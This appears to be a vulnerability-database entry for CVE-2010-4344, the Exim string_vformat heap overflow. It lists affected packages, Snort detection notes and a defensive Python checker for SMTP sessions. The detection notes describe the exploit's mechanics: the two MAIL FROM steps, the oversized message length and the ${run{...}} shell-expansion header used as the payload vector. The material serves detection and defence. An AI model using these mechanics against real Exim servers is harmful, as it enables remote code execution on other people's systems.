cbcvebase.
CVE-2010-4344
published 2010-12-14


Priority: P1 94 critical · CVSS 3.1 base score: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 71.79% (99.3rd percentile)
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.

Affected (9 ranges)

Vendor    | Product      | Version range              | Fixed in
canonical | ubuntu_linux |                            |
canonical | ubuntu_linux |                            |
canonical | ubuntu_linux |                            |
debian    | debian_linux |                            |
debian    | exim4        | < exim4 4.70-1 (bookworm)  | exim4 4.70-1 (bookworm)
exim      | exim         | < 4.70                     | 4.70
opensuse  | opensuse     |                            |
opensuse  | opensuse     |                            |
opensuse  | opensuse     |                            |

Detection & IOCs (extracted from sources)

Snort: SID 124:2:1
  • Snort SMTP preprocessor SID 124:2:1 fires on oversized SMTP header lines (>2000 bytes) characteristic of CVE-2010-4344 exploitation; no custom config required with default settings.
  • Alert on SMTP DATA headers exceeding ~2896 characters; the PoC triggers the alert with '(smtp) Attempted data header buffer overflow: 2896 chars'.
  • Exploit requires two MAIL FROM commands in a single SMTP session: first to deliver the oversized message (triggering rejection logging overflow), second to trigger expand_string execution of the injected ACL payload.
  • Look for Exim ${run{...}} expansion strings embedded inside SMTP message headers — this is the payload delivery mechanism used to execute shell commands.
  • Detect oversized SMTP DATA messages (exceeding the server's advertised SIZE limit by 256 KB) sent to trigger rejection-log heap overflow; the exploit sets msg_len = max_msg + 1024*256.
  • Snort SMTP preprocessor max_header_line_len must be set to 2000 bytes or less to ensure SID 124:2:1 fires; the default is 1000 bytes, but operators who have raised this value above 2000 will miss the attack.
  • The heap overflow is only triggered when Exim's rejection header logging is active (the default). Deployments that have disabled rejection logging in exim.conf will not be exploitable via this specific vector.
  • The Metasploit module targets Exim versions matching /Exim 4\.6\d+/ in the banner; it will abort with a warning for other version strings unless SkipVersionCheck is set, meaning detection based solely on banner version may miss patched or differently versioned installs.
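A defender-side check that applies the signals listed above to a captured SMTP session, added here as an example (not code from the page's sources, Snort or Metasploit): it counts MAIL FROM commands, flags header lines over the 2000-byte Snort threshold or carrying an Exim ${run{ expansion, and compares the message length with the server's advertised SIZE limit. The transcript, the X-Note header and the ${run{PLACEHOLDER}} marker are constructed sample data.

```python
import re

# Snort SMTP max_header_line_len at which SID 124:2:1 fires (from the page)
HEADER_LINE_LIMIT = 2000
RUN_EXPANSION = re.compile(r"\$\{run\{")


def analyze_session(transcript: str, advertised_size: int) -> dict:
    """Apply the CVE-2010-4344 signals to one SMTP session (client side,
    CRLF-separated). advertised_size is the server's SIZE extension limit."""
    signals = {"mail_from_count": 0, "long_header": False,
               "run_expansion": False, "oversized_message": False}
    in_data = in_headers = False
    msg_len = 0
    for line in transcript.split("\r\n"):
        if not in_data:
            if line.upper().startswith("MAIL FROM:"):
                signals["mail_from_count"] += 1      # two in one session is the pattern
            elif line.upper() == "DATA":
                in_data, in_headers, msg_len = True, True, 0
            continue
        if line == ".":                              # end of message
            signals["oversized_message"] |= msg_len > advertised_size
            in_data = False
            continue
        msg_len += len(line) + 2                     # count the CRLF too
        if in_headers:
            if line == "":                           # blank line ends the headers
                in_headers = False
            else:
                signals["long_header"] |= len(line) > HEADER_LINE_LIMIT
                signals["run_expansion"] |= bool(RUN_EXPANSION.search(line))
    signals["suspicious"] = (signals["mail_from_count"] > 1 or signals["long_header"]
                             or signals["run_expansion"] or signals["oversized_message"])
    return signals


# Constructed sample transcript: two MAIL FROM commands and one header that is
# both oversized and carries an expansion marker (placeholder, not a payload).
SAMPLE_SESSION = "\r\n".join([
    "EHLO client.example", "MAIL FROM:<a@example.org>", "RCPT TO:<b@example.net>",
    "DATA", "Subject: test", "X-Note: " + "A" * 2500 + " ${run{PLACEHOLDER}}",
    "", "body", ".", "MAIL FROM:<a@example.org>", "QUIT",
])

if __name__ == "__main__":
    print(analyze_session(SAMPLE_SESSION, advertised_size=52428800))
```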

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 9.8   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd           | v2.0    | 9.3   | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C
osv           |         | 9.8   | CRITICAL |
vulncheck     |         | 9.8   | CRITICAL |
cisa          |         | 9.8   | CRITICAL |
vendor_debian |         | 9.8   | CRITICAL |
vendor_redhat |         | 9.8   | CRITICAL |